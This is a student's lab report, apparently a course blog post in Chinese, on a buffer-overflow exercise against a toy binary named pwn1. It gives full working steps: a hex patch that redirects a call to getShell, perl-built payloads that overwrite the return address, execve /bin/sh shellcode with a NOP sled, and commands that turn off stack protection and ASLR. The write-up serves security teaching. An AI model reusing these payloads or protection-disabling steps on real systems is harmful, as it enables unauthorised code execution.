20212906 2021-2022-2 《网络攻防实践》第九次作业

一、实验准备

1 逆向及Bof基础实践说明

1.1 实践目标

  • 本次实践的对象是一个名为pwn1的linux可执行文件。

  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。

  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。

  • 注入一个自己制作的shellcode并运行这段shellcode。

1.2 基础知识

  • 常用的Linux基本操作

    • objdump -d:从objfile中反汇编那些特定指令机器码的section。
    • perl -e:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。
    • xxd:为给定的标准输入或者文件做一次十六进制的输出,它也可以将十六进制输出转换为原来的二进制格式。
    • ps -ef:显示所有进程,并显示每个进程的UID,PPIP,C与STIME栏位。
    • |:管道,将前者的输出作为后者的输入。
    • :输入输出重定向符,将前者输出的内容输入到后者中。
  • NOP, JNE, JE, JMP, CMP汇编指令的机器码:

    • NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
    • JNE:条件转移指令,如果不相等则跳转。(机器码:75)
    • JE:条件转移指令,如果相等则跳转。(机器码:74)
    • JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB) 段内直接近转移Jmp near(机器码:E9) 段内间接转移 Jmp word(机器码:FF) 段间直接(远)转移Jmp far(机器码:EA)
    • CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

二、实验过程

1 直接修改程序机器指令,改变程序执行流程

知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具

学习目标:理解可执行文件与机器指令

进阶:掌握ELF文件格式,掌握动态技术

  1. 使用objdump -d pwn1 | more将pwn1反汇编,得到以下代码(只展示部分核心代码):

  2. 修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff

具体操作:   
    1. vi pwn1进入命令模式   
    2. 输入:%!xxd将显示模式切换为十六进制     
    3. 在底行模式输入/e8 d7定位需要修改的地方,并确认   
    4. 进入插入模式,修改d7为c3   
    5. 输入:%!xxd -r将十六进制转换为原格式   
    6. 使用:wq保存并退出   

  1. 再反汇编看一下,call指令是否正确调用getShell

  2. 输入./pwn1运行,可以得到shell提示符#

2 通过构造输入参数,造成BOF攻击,改变程序执行流

  • 知识要求:堆栈结构,返回地址

  • 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取

  • 进阶:掌握ELF文件格式,掌握动态技术

2.1 反汇编,了解程序的基本功能

  • 利用foo()函数中buffer漏洞,输入足够长的字符串能够造成缓存区溢出,使其覆盖到返回地址。

  • 输入足够长的字符串,把原来的返回地址覆盖成现在getshell()的起始地址。

2.2 确认输入字符串哪几个字符会覆盖到返回地址

具体操作:

   1. 输入gdb pwn2进行调试
   2. 输入r运行程序
   3. 输入字符串111111112222222233333334444444412345678发现已经造成溢出
   4. 输入info r 查看eip的值,发现输入的1234被覆盖到堆栈上的返回地址

只要把1234这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

2.3 确认用什么值来覆盖返回地址

正确应用输入 11111111222222223333333344444444\x7d\x84\x04\x08

2.4 构造输入字符串

由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

具体步骤:

   1. 输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
   2. 输入xxd input 查看input文件是否符合预期。
   3. 然后将input的输入,通过管道符“|”,作为pwn1_2的输入。即输入 (cat input; cat) | ./pwn2 input的输入
   

3. 注入Shellcode并执行

3.1 准备一段Shellcode

  • shellcode就是一段机器指令(code)
    • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
    • 所以这段机器指令被称为shellcode。
    • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

3.2 准备工作

修改些设置。

具体步骤:

   1. apt-get install execstack //安装execstack命令
   2. execstack -s pwn3    //设置堆栈可执行
   3. execstack -q pwn3    //查询文件的堆栈是否可执行
   4. more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化 
   5. echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
   6. more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化 

3.3 构造要注入的payload。

Linux下有两种基本构造攻击buf的方法:

  • retaddr+nop+shellcode
  • nop+shellcode+retaddr。

因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。

简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

我们结构为:nops+shellcode+retaddr。

具体步骤:

1. 输入 perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
2. 输入 (cat input_shellcode;cat) | ./pwn3 
3. 再开另外一个终端,用gdb来调试pwn1这个进程,输入 ps -ef | grep pwn3 命令找到pwn3的进程号是:6662
4. 用 attach 6662 命令启动gdb调试这个进程
5. 通过设置断点输入 disassemble foo 来查看注入buf的内存地址
6. 输入 break *0x080484ae 设置断点,输入 c 继续运行,同时在pwn1进程正在运行的终端敲回车,使其继续执行。
7. 再返回调试终端,使用info r esp命令查找地址
8. 输入 x/16x 0xffffd4fc 命令查看其存放内容0x01020304 就是返回地址的位置。根据我们构造的input_shellcode可知地址应为 0xffffd300 
9. 输入 perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 将之前的\x4\x3\x2\x1改为这个地址
10. 输入 (cat input_shellcode;cat) | ./pwn3 执行程序,攻击成功! 

三、实验问题

1.execstack软件包定位失败
更换kali下载源

四、实验收获与感想

通过本次网络对抗技术实验,我实现了手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数,利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数以及注入一个自己制作的shellcode并运行这段shellcode。因为是首次做网络对抗实验,所以本次实验我主要是观看老师的教学视频,跟着老师的步骤,一步一步完成的,通过理解老师所讲的汇编语言、机器指令和栈帧的相关知识,明白缓冲区溢出攻击的原理,最后尝试抛开指导,用所学到的知识独立完成实验。
本次实验让我受益匪浅,期待下次实验能让我对这门课程有更深的理解和感悟。

posted @ 2022-05-09 20:22  MizDow  阅读(75)  评论(0编辑  收藏  举报